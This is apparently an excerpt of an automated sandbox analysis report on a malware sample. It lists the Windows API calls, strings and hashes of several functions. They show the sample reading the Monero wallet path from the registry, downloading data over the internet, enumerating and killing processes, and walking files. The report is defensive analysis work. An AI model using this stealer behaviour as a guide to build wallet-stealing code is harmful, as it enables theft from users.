                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008C1039
                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008C1053
                                    • RegCloseKey.ADVAPI32(?), ref: 008C105D
                                    Strings
                                    • SOFTWARE\monero-project\monero-core, xrefs: 008C102F
                                    • wallet_path, xrefs: 008C104D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                    • API String ID: 3225020163-4244082812
                                    • Opcode ID: a70b0d546eafbcf57b0b4d9454e30b1fbaff71445f124f4cbaa9a65f8f1dbf66
                                    • Instruction ID: 2dd6d021ebd343de0b675ffa4ad8ee0361c7ed9c9e0f630519f9cfe726ad089c
                                    • Opcode Fuzzy Hash: a70b0d546eafbcf57b0b4d9454e30b1fbaff71445f124f4cbaa9a65f8f1dbf66
                                    • Instruction Fuzzy Hash: FFF01D75640209BFEB10EBE09C4DFBB7B7CEB04755F100154BE05E2281DAB55A45C7A0
                                    Function 008C9E40 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 008C9E64
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 008C9EA2
                                    • LocalAlloc.KERNEL32(00000040), ref: 008C9F07
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • lstrcpy.KERNEL32(00000000,008F5210), ref: 008CA012
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpymemcmp$AllocLocal
                                    • String ID: @$v10$v20
                                    • API String ID: 102826412-278772428
                                    • Opcode ID: 9fd6c0fd720744fc0d59e7c9452c5dbaa24c8084cbd650c5f3dc3e2aa009c27f
                                    • Instruction ID: b27ee3e7d5e977c13b0789e0e0faff7220e6c3605356b8243f2ae7dbce6c6d54
                                    • Opcode Fuzzy Hash: 9fd6c0fd720744fc0d59e7c9452c5dbaa24c8084cbd650c5f3dc3e2aa009c27f
                                    • Instruction Fuzzy Hash: 3C519A71A106099BDB10EFA8CC85F9E7BB4FF01314F054168FA59EB291DB70ED098B91
                                    Function 008C5570 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008C5589
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C5590
                                    • InternetOpenA.WININET(008ED014,00000000,00000000,00000000,00000000), ref: 008C55A6
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 008C55C1
                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 008C55EC
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 008C5611
                                    • InternetCloseHandle.WININET(?), ref: 008C562B
                                    • InternetCloseHandle.WININET(00000000), ref: 008C5632
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 1008454911-0
                                    • Opcode ID: df50c4018200867ca5916d15d77ce0309a56bd4d580cacc895c3fc4ba6da544b
                                    • Instruction ID: 20250ba03c9a98705eb692015320472d0388cc48a5267afbeef899c53ad7b08e
                                    • Opcode Fuzzy Hash: df50c4018200867ca5916d15d77ce0309a56bd4d580cacc895c3fc4ba6da544b
                                    • Instruction Fuzzy Hash: DE414B70A00604AFDB14CF95DC48FAAB7B4FF88714F5481A9E508DB290D771E982CF94
                                    Function 008E4760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008E4779
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E4789
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E479B
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008E47BC
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008E47CB
                                    • CloseHandle.KERNEL32(00000000), ref: 008E47D2
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E47E0
                                    • CloseHandle.KERNEL32(00000000), ref: 008E47EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 10d0f9bdc854b448b1c8164e01e11d1b5486c9085b5f46b25c971c65b3cc4ab0
                                    • Instruction ID: 434a1bf4dfaf6e43fd567d8d8004a36f8d70d419070e27e0ad09d4b8ff815705
                                    • Opcode Fuzzy Hash: 10d0f9bdc854b448b1c8164e01e11d1b5486c9085b5f46b25c971c65b3cc4ab0
                                    • Instruction Fuzzy Hash: 2A019E71601218AFE7209BE19C89FFA777CEB0A751F001195F909D1180EF759D91CBA0
                                    Function 008CE4EF Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8F5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE944
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE96A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE9A2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008CE9D8
                                    • FindClose.KERNEL32(00000000), ref: 008CE9E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$CloseFileNext
                                    • String ID:
                                    • API String ID: 1875835556-0
                                    • Opcode ID: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction ID: e4cb42b11c230c41ca223869ef92c7681ae1b1c1e7200b8aa4c3cea0a7c190be
                                    • Opcode Fuzzy Hash: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction Fuzzy Hash: 7D02B470A112158FDB68CF59C588B65B7F5FF44728B29C1ADD849DB2A2D732EC82CB40
                                    Function 008CE595 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8F5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE944
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE96A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE9A2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008CE9D8
                                    • FindClose.KERNEL32(00000000), ref: 008CE9E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$CloseFileNext
                                    • String ID:
                                    • API String ID: 1875835556-0
                                    • Opcode ID: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction ID: e4cb42b11c230c41ca223869ef92c7681ae1b1c1e7200b8aa4c3cea0a7c190be
                                    • Opcode Fuzzy Hash: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction Fuzzy Hash: 7D02B470A112158FDB68CF59C588B65B7F5FF44728B29C1ADD849DB2A2D732EC82CB40
                                    Function 008CE574 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE8F5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE944
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE96A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CE9A2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008CE9D8
                                    • FindClose.KERNEL32(00000000), ref: 008CE9E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$CloseFileNext
                                    • String ID:
                                    • API String ID: 1875835556-0
                                    • Opcode ID: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction ID: e4cb42b11c230c41ca223869ef92c7681ae1b1c1e7200b8aa4c3cea0a7c190be
                                    • Opcode Fuzzy Hash: e70356086ea1d5708754e4497ae97bcc299e00e85cb235bb7cb4e19d1a681c5d
                                    • Instruction Fuzzy Hash: 7D02B470A112158FDB68CF59C588B65B7F5FF44728B29C1ADD849DB2A2D732EC82CB40
                                    Function 008D8470 Relevance: 10.6, APIs: 7, Instructions: 145stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D84C5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D84FC
                                    • lstrlen.KERNEL32(00000000), ref: 008D8542
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D8575
                                    • lstrlen.KERNEL32(00000000), ref: 008D858B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D85BA
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D85CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 66b3d5a87c3bf4d94de6f4094c28bee22d78bb9f5435f7c32ac6460287541806
                                    • Instruction ID: a8afa5394677ed5157a6b383007477df4ab226b65526eb9b18d09dab74bcb734
                                    • Opcode Fuzzy Hash: 66b3d5a87c3bf4d94de6f4094c28bee22d78bb9f5435f7c32ac6460287541806
                                    • Instruction Fuzzy Hash: 9B515A71900606DBCB20DFA8E884A6BBBB9FF84310F18865AEC45DB355EF30E941CB55
                                    Function 008DD8C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0053D750,00000000,00020119,?,00000000,000000FE), ref: 008DD90C
                                    • RegQueryValueExA.ADVAPI32(?,0053E4D8,00000000,00000000,?,?), ref: 008DD933
                                    • RegCloseKey.ADVAPI32(?), ref: 008DD93E
                                    • lstrcat.KERNEL32(?,?), ref: 008DD964
                                    • lstrcat.KERNEL32(?,0053E4F0), ref: 008DD976
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID: 8S
                                    • API String ID: 690832082-3026468002
                                    • Opcode ID: 3a45fdd4f3ebf11000a0a5b1d52ccf497bc604e6765613429ff7b3cd8e922e41
                                    • Instruction ID: 7d561c4aae9b1a17ef882b47df27833cb9754d132a312d2b7b01d87bb7fbedc4
                                    • Opcode Fuzzy Hash: 3a45fdd4f3ebf11000a0a5b1d52ccf497bc604e6765613429ff7b3cd8e922e41
                                    • Instruction Fuzzy Hash: 09416F71214244AFD754EFA8D886FAA77B4FB84304F408429B98CC7292DF34E949CB93
                                    Function 008E28B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 008E28C5
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E28CC
                                    • RegOpenKeyExA.ADVAPI32(80000002,0052C470,00000000,00020119,008E2849), ref: 008E28EB
                                    • RegQueryValueExA.ADVAPI32(008E2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 008E2905
                                    • RegCloseKey.ADVAPI32(008E2849), ref: 008E290F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
